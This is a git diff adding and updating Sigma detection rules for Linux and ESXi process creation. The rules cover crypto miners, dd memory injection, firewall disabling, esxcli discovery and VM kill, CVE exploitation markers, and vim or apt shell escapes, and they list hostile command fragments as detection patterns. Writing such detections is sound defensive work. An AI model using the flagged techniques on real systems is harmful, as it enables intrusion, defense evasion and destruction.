b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml index 6662c9e40..3d998d06c 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml @@ -1,38 +1,42 @@ title: Linux Crypto Mining Indicators id: 9069ea3c-b213-4c52-be13-86506a227ab1 -status: experimental +status: test description: Detects command line parameters or strings often used by crypto miners references: - - https://www.poolwatch.io/coin/monero + - https://www.poolwatch.io/coin/monero +author: Florian Roth (Nextron Systems) date: 2021/10/26 -author: Florian Roth +modified: 2022/12/25 +tags: + - attack.impact + - attack.t1496 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - CommandLine|contains: - - ' --cpu-priority=' - - '--donate-level=0' - - ' -o pool.' - - ' --nicehash' - - ' --algo=rx/0 ' - - 'stratum+tcp://' - - 'stratum+udp://' - # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives - - 'sh -c /sbin/modprobe msr allow_writes=on' - # base64 encoded: --donate-level= - - 'LS1kb25hdGUtbGV2ZWw9' - - '0tZG9uYXRlLWxldmVsP' - - 'tLWRvbmF0ZS1sZXZlbD' - # base64 encoded: stratum+tcp:// and stratum+udp:// - - 'c3RyYXR1bSt0Y3A6Ly' - - 'N0cmF0dW0rdGNwOi8v' - - 'zdHJhdHVtK3RjcDovL' - - 'c3RyYXR1bSt1ZHA6Ly' - - 'N0cmF0dW0rdWRwOi8v' - - 'zdHJhdHVtK3VkcDovL' - condition: selection + selection: + CommandLine|contains: + - ' --cpu-priority=' + - '--donate-level=0' + - ' -o pool.' + - ' --nicehash' + - ' --algo=rx/0 ' + - 'stratum+tcp://' + - 'stratum+udp://' + # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives + - 'sh -c /sbin/modprobe msr allow_writes=on' + # base64 encoded: --donate-level= + - 'LS1kb25hdGUtbGV2ZWw9' + - '0tZG9uYXRlLWxldmVsP' + - 'tLWRvbmF0ZS1sZXZlbD' + # base64 encoded: stratum+tcp:// and stratum+udp:// + - 'c3RyYXR1bSt0Y3A6Ly' + - 'N0cmF0dW0rdGNwOi8v' + - 'zdHJhdHVtK3RjcDovL' + - 'c3RyYXR1bSt1ZHA6Ly' + - 'N0cmF0dW0rdWRwOi8v' + - 'zdHJhdHVtK3VkcDovL' + condition: selection falsepositives: - - Legitimate use of crypto miners + - Legitimate use of crypto miners level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml new file mode 100644 index 000000000..1e80ebbf8 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -0,0 +1,22 @@ +title: Curl Usage on Linux +id: ea34fb97-e2c4-4afb-810f-785e4459b194 +status: test +description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server +references: + - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/09/15 +tags: + - attack.command_and_control + - attack.t1105 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/curl' + condition: selection +falsepositives: + - Scripts created by developers and admins + - Administrative activity +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml index 8fa4944dc..fa251f6e9 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml @@ -1,14 +1,14 @@ title: Atlassian Confluence CVE-2022-26134 id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66 -status: experimental -description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 -author: Nasreddine Bencherchali -date: 2022/06/03 related: - id: 245f92e3-c4da-45f1-9070-bc552e06db11 type: derived +status: test +description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 references: - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/06/03 tags: - attack.initial_access - attack.execution diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml new file mode 100644 index 000000000..aef001baf --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml @@ -0,0 +1,27 @@ +title: Apache Spark Shell Command Injection - ProcessCreation +id: c8a5f584-cdc8-42cc-8cce-0398e4265de3 +status: test +description: Detects attempts to exploit an apache spark server via CVE-2014-6287 from a commandline perspective +references: + - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py + - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html + - https://github.com/apache/spark/pull/36315/files +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/20 +tags: + - attack.initial_access + - attack.t1190 + - cve.2022.33891 +logsource: + product: linux + category: process_creation +detection: + selection: + ParentImage|endswith: '\bash' + CommandLine|contains: + - 'id -Gn `' + - "id -Gn '" + condition: selection +falsepositives: + - Unlikely +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml index f6eb7104a..71ffcad28 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml @@ -1,29 +1,30 @@ title: DD File Overwrite id: 2953194b-e33c-4859-b9e8-05948c167447 -status: experimental +status: test description: Detects potential overwriting and deletion of a file using DD. -date: 2021/10/15 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +date: 2021/10/15 +modified: 2022/07/07 tags: - attack.impact - attack.t1485 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection1: - Image: - - '/bin/dd' - - '/usr/bin/dd' - selection2: - CommandLine|contains: 'of=' - selection3: - CommandLine|contains: - - 'if=/dev/zero' - - 'if=/dev/null' - condition: selection1 and selection2 and selection3 + selection1: + Image: + - '/bin/dd' + - '/usr/bin/dd' + selection2: + CommandLine|contains: 'of=' + selection3: + CommandLine|contains: + - 'if=/dev/zero' + - 'if=/dev/null' + condition: all of selection* falsepositives: - - Any user deleting files that way. + - Any user deleting files that way. level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml new file mode 100644 index 000000000..4d7d8fbbb --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml @@ -0,0 +1,26 @@ +title: Potential Linux Process Code Injection Via DD Utility +id: 4cad6c64-d6df-42d6-8dae-eb78defdc415 +status: experimental +description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. +references: + - https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/ + - https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh +author: Joseph Kamau +date: 2023/12/01 +tags: + - attack.defense_evasion + - attack.t1055.009 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/dd' + CommandLine|contains|all: + - 'of=' + - '/proc/' + - '/mem' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml new file mode 100644 index 000000000..f99cf647c --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml @@ -0,0 +1,28 @@ +title: Ufw Force Stop Using Ufw-Init +id: 84c9e83c-599a-458a-a0cb-0ecce44e807a +status: test +description: Detects attempts to force stop the ufw using ufw-init +references: + - https://blogs.blackberry.com/ + - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/01/18 +tags: + - attack.defense_evasion + - attack.t1562.004 +logsource: + product: linux + category: process_creation +detection: + selection_init: + CommandLine|contains|all: + - '-ufw-init' + - 'force-stop' + selection_ufw: + CommandLine|contains|all: + - 'ufw' + - 'disable' + condition: 1 of selection_* +falsepositives: + - Network administrators +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml index c47444781..564c37a36 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml @@ -1,7 +1,7 @@ title: Linux Doas Tool Execution id: 067d8238-7127-451c-a9ec-fa78045b618b status: stable -description: Detects the doas tool execution in linux host platform. +description: Detects the doas tool execution in linux host platform. This utility tool allow standard users to perform tasks as root, the same way sudo does. references: - https://research.splunk.com/endpoint/linux_doas_tool_execution/ - https://www.makeuseof.com/how-to-install-and-use-doas/ diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml new file mode 100644 index 000000000..5d1caec25 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml @@ -0,0 +1,29 @@ +title: ESXi Network Configuration Discovery Via ESXCLI +id: 33e814e0-1f00-4e43-9c34-31fb7ae2b174 +status: experimental +description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. +references: + - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ + - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html +author: Cedric Maurugeon +date: 2023/09/04 +tags: + - attack.discovery + - attack.t1033 + - attack.t1007 +logsource: + category: process_creation + product: linux +detection: + selection_img: + Image|endswith: '/esxcli' + CommandLine|contains: 'network' + selection_cli: + CommandLine|contains: + - ' get' + - ' list' + condition: all of selection_* +falsepositives: + - Legitimate administration activities +# Note: level can be reduced to low in some envs +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml new file mode 100644 index 000000000..fbcfc4311 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml @@ -0,0 +1,25 @@ +title: ESXi Admin Permission Assigned To Account Via ESXCLI +id: 9691f58d-92c1-4416-8bf3-2edd753ec9cf +status: experimental +description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account. +references: + - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/09/04 +tags: + - attack.execution +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/esxcli' + CommandLine|contains: 'system' + CommandLine|contains|all: + - ' permission ' + - ' set' + - 'Admin' + condition: selection +falsepositives: + - Legitimate administration activities +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml new file mode 100644 index 000000000..d2436ef0f --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml @@ -0,0 +1,30 @@ +title: ESXi Storage Information Discovery Via ESXCLI +id: f41dada5-3f56-4232-8503-3fb7f9cf2d60 +status: experimental +description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. +references: + - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html + - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html + - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html +author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +date: 2023/09/04 +tags: + - attack.discovery + - attack.t1033 + - attack.t1007 +logsource: + category: process_creation + product: linux +detection: + selection_img: + Image|endswith: '/esxcli' + CommandLine|contains: 'storage' + selection_cli: + CommandLine|contains: + - ' get' + - ' list' + condition: all of selection_* +falsepositives: + - Legitimate administration activities +# Note: level can be reduced to low in some envs +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml new file mode 100644 index 000000000..bdbb0d9b4 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml @@ -0,0 +1,28 @@ +title: ESXi Syslog Configuration Change Via ESXCLI +id: 38eb1dbb-011f-40b1-a126-cf03a0210563 +status: experimental +description: Detects changes to the ESXi syslog configuration via "esxcli" +references: + - https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US + - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html +author: Cedric Maurugeon +date: 2023/09/04 +tags: + - attack.defense_evasion + - attack.t1562.001 + - attack.t1562.003 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/esxcli' + CommandLine|contains|all: + - 'system' + - 'syslog' + - 'config' + CommandLine|contains: ' set' + condition: selection +falsepositives: + - Legitimate administrative activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml new file mode 100644 index 000000000..d08272019 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml @@ -0,0 +1,28 @@ +title: ESXi System Information Discovery Via ESXCLI +id: e80273e1-9faf-40bc-bd85-dbaff104c4e9 +status: experimental +description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc. +references: + - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ + - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html +author: Cedric Maurugeon +date: 2023/09/04 +tags: + - attack.discovery + - attack.t1033 + - attack.t1007 +logsource: + category: process_creation + product: linux +detection: + selection_img: + Image|endswith: '/esxcli' + CommandLine|contains: 'system' + selection_cli: + CommandLine|contains: + - ' get' + - ' list' + condition: all of selection_* +falsepositives: + - Legitimate administration activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml new file mode 100644 index 000000000..addf67f9b --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml @@ -0,0 +1,25 @@ +title: ESXi Account Creation Via ESXCLI +id: b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db +status: experimental +description: Detects user account creation on ESXi system via esxcli +references: + - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html +author: Cedric Maurugeon +date: 2023/08/22 +tags: + - attack.persistence + - attack.t1136 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/esxcli' + CommandLine|contains|all: + - 'system ' + - 'account ' + - 'add ' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml new file mode 100644 index 000000000..0bdd6fe88 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml @@ -0,0 +1,27 @@ +title: ESXi VM List Discovery Via ESXCLI +id: 5f1573a7-363b-4114-9208-ad7a61de46eb +status: experimental +description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. +references: + - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ + - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html + - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/ + - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html +author: Cedric Maurugeon +date: 2023/09/04 +tags: + - attack.discovery + - attack.t1033 + - attack.t1007 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/esxcli' + CommandLine|contains: 'vm process' + CommandLine|endswith: ' list' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml new file mode 100644 index 000000000..5e69c617b --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml @@ -0,0 +1,26 @@ +title: ESXi VM Kill Via ESXCLI +id: 2992ac4d-31e9-4325-99f2-b18a73221bb2 +status: experimental +description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. +references: + - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ + - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html + - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/ + - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html +author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +date: 2023/09/04 +tags: + - attack.execution +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: '/esxcli' + CommandLine|contains|all: + - 'vm process' + - 'kill' + condition: selection +falsepositives: + - Legitimate administration activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml new file mode 100644 index 000000000..c7ebfe228 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml @@ -0,0 +1,30 @@ +title: ESXi VSAN Information Discovery Via ESXCLI +id: d54c2f06-aca9-4e2b-81c9-5317858f4b79 +status: experimental +description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. +references: + - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html + - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html + - https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vsan.html +author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +date: 2023/09/04 +tags: + - attack.discovery + - attack.t1033 + - attack.t1007 +logsource: + category: process_creation + product: linux +detection: + selection_img: + Image|endswith: '/esxcli' + CommandLine|contains: 'vsan' + selection_cli: + CommandLine|contains: + - ' get' + - ' list' + condition: all of selection_* +falsepositives: + - Legitimate administration activities +# Note: level can be reduced to low in some envs +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml index ca2781257..a7c0e3ce8 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml @@ -1,30 +1,30 @@ -title: File and Directory Discovery +title: File and Directory Discovery - Linux id: d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72 status: test description: Detects usage of system utilities to discover files and directories -author: Daniil Yugoslavskiy, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md +author: Daniil Yugoslavskiy, oscd.community date: 2020/10/19 -modified: 2021/11/27 +modified: 2022/11/25 +tags: + - attack.discovery + - attack.t1083 logsource: - category: process_creation - product: linux + category: process_creation + product: linux detection: - select_file_with_asterisk: - Image|endswith: '/file' - CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline - select_recursive_ls: - Image|endswith: '/ls' - CommandLine|contains: '-R' - select_find_execution: - Image|endswith: '/find' - select_tree_execution: - Image|endswith: '/tree' - condition: 1 of select* + select_file_with_asterisk: + Image|endswith: '/file' + CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline + select_recursive_ls: + Image|endswith: '/ls' + CommandLine|contains: '-R' + select_find_execution: + Image|endswith: '/find' + select_tree_execution: + Image|endswith: '/tree' + condition: 1 of select* falsepositives: - - Legitimate activities + - Legitimate activities level: informational -tags: - - attack.discovery - - attack.t1083 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml index 391975730..47adf83de 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_file_deletion.yml @@ -1,11 +1,15 @@ title: File Deletion id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 status: stable -description: Detects file deletion commands +description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md author: Ömer Günal, oscd.community date: 2020/10/07 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md +modified: 2022/09/15 +tags: + - attack.defense_evasion + - attack.t1070.004 logsource: product: linux category: process_creation @@ -14,10 +18,8 @@ detection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' + - '/unlink' condition: selection falsepositives: - Legitimate administration activities level: informational -tags: - - attack.defense_evasion - - attack.t1070.004 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml new file mode 100644 index 000000000..73eaf0076 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml @@ -0,0 +1,33 @@ +title: OS Architecture Discovery Via Grep +id: d27ab432-2199-483f-a297-03633c05bae6 +status: experimental +description: | + Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo" +references: + - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html + - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ + - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection + - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection +author: Joseliyo Sanchez, @Joseliyo_Jstnk +date: 2023/06/02 +tags: + - attack.discovery + - attack.t1082 +logsource: + category: process_creation + product: linux +detection: + selection_process: + Image|endswith: '/grep' + selection_architecture: + CommandLine|endswith: + - 'aarch64' + - 'arm' + - 'i386' + - 'i686' + - 'mips' + - 'x86_64' + condition: all of selection_* +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_groupdel.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_groupdel.yml new file mode 100644 index 000000000..6d10e5a4f --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_groupdel.yml @@ -0,0 +1,24 @@ +title: Group Has Been Deleted Via Groupdel +id: 8a46f16c-8c4c-82d1-b121-0fdd3ba70a84 +status: test +description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks +references: + - https://linuxize.com/post/how-to-delete-group-in-linux/ + - https://www.cyberciti.biz/faq/linux-remove-user-command/ + - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/ + - https://linux.die.net/man/8/groupdel +author: Tuan Le (NCSGroup) +date: 2022/12/26 +tags: + - attack.impact + - attack.t1531 +logsource: + product: linux + category: process_creation +detection: + selection: + Image|endswith: '/groupdel' + condition: selection +falsepositives: + - Legitimate administrator activities +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml new file mode 100644 index 000000000..2ef7e1b58 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml @@ -0,0 +1,25 @@ +title: Apt GTFOBin Abuse - Linux +id: bb382fd5-b454-47ea-a264-1828e4c766d6 +status: test +description: Detects usage of "apt" and "apt-get" as a GTFOBin to execute and proxy command and binary execution +references: + - https://gtfobins.github.io/gtfobins/apt/ + - https://gtfobins.github.io/gtfobins/apt-get/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/12/28 +tags: + - attack.discovery + - attack.t1083 +logsource: + category: process_creation + product: linux +detection: + selection: + Image|endswith: + - '/apt' + - '/apt-get' + CommandLine|contains: 'APT::Update::Pre-Invoke::=' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml new file mode 100644 index 000000000..de4f854c3 --- /dev/null +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml @@ -0,0 +1,39 @@ +title: Vim GTFOBin Abuse - Linux +id: 7ab8f73a-fcff-428b-84aa-6a5ff7877dea +status: test +description: Detects usage of "vim" and it's siblings as a GTFOBin to execute and proxy command and binary execution +references: + - https://gtfobins.github.io/gtfobins/vim/ + - https://gtfobins.github.io/gtfobins/rvim/ + - https://gtfobins.github.io/gtfobins/vimdiff/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/12/28 +tags: + - attack.discovery + - attack.t1083 +logsource: + category: process_creation + product: linux +detection: + selection_img: + Image|endswith: + - '/vim' + - '/rvim' + - '/vimdiff' + CommandLine|contains: + - ' -c ' + - ' --cmd' + selection_cli: + CommandLine|contains: + - ':!/' + - ':py ' + - ':lua ' + - '/bin/sh' + - '/bin/bash' + - '/bin/dash' + - '/bin/zsh' + - '/bin/fish' + condition: all of selection_* +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml index e1e66a138..ea8e6b830 100644 --- a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml +++ b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_root_certificate.yml @@ -1,24 +1,24 @@ title: Install Root Certificate id: 78a80655-a51e-4669-bc6b-e9d206a462ee status: test -description: Detects installed new certificate -author: Ömer Günal, oscd.community +description: Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md +author: Ömer Günal, oscd.community date: 2020/10/05 -modified: 2021/11/27 +modified: 2022/07/07 +tags: + - attack.defense_evasion + - attack.t1553.004 logsource: - product: linux - category: process_creation + product: linux + category: process_creation detection: - selection: - Image|endswith: - - '/update-ca-certificates' - - '/update-ca-trust' - condition: selection + selection: + Image|endswith: + - '/update-ca-certificates' + - '/update-ca-trust' + condition: selection falsepositives: - - Legitimate administration activities + - Legitimate administration activities level: low -tags: - - attack.defense_evasion - - attack.t1553.004 diff --git a/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml b/src/main/resources/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml new file mode 100644 index 000000000..48712c358 --- /dev/null +++ 